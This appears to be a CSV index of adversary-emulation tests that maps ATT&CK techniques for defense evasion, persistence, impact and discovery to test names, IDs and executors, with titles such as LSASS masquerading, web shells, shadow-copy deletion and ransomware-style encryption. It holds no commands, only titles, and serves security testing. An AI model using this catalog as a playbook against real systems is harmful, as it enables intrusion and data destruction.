defense-evasion,T1036.003,Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1036.003,Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
defense-evasion,T1036.003,Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt
defense-evasion,T1036.003,Rename System Utilities,5,Masquerading - powershell.exe running as taskhostw.exe,ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa,command_prompt
defense-evasion,T1036.003,Rename System Utilities,6,Masquerading - non-windows exe running as windows exe,bc15c13f-d121-4b1f-8c7d-28d95854d086,powershell
defense-evasion,T1036.003,Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
defense-evasion,T1036.003,Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,Windows Signed Driver Rootkit Test,8e4e1985-9a19-4529-b4b8-b7a49ff87fae,command_prompt
defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer - Execute arbitrary PowerShell code,d590097e-d402-44e2-ad72-2c6aa1ce78b1,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1027.002,Software Packing,3,Binary simply packed by UPX,b16ef901-00bb-4dda-b4fc-a04db5067e20,sh
defense-evasion,T1027.002,Software Packing,4,"Binary packed by UPX, with modified headers",4d46e16b-5765-4046-9f25-a600d3e65e4d,sh
defense-evasion,T1036.006,Space after Filename,1,Space After Filename,89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1070.006,Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
defense-evasion,T1070.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
defense-evasion,T1070.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
defense-evasion,T1070.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
persistence,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
persistence,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1505.003,Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt
impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1491.001,Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,bash
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash
impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt,4312cdbc-79fc-4a9c-becc-53d49c734bc5,command_prompt
discovery,T1217,Browser Bookmark Discovery,7,List Internet Explorer Bookmarks using the command prompt,727dbcdb-e495-4ab1-a6c4-80c7f77aef85,command_prompt
discovery,T1087.002,Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
discovery,T1087.002,Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
discovery,T1087.002,Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
discovery,T1087.002,Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,command_prompt
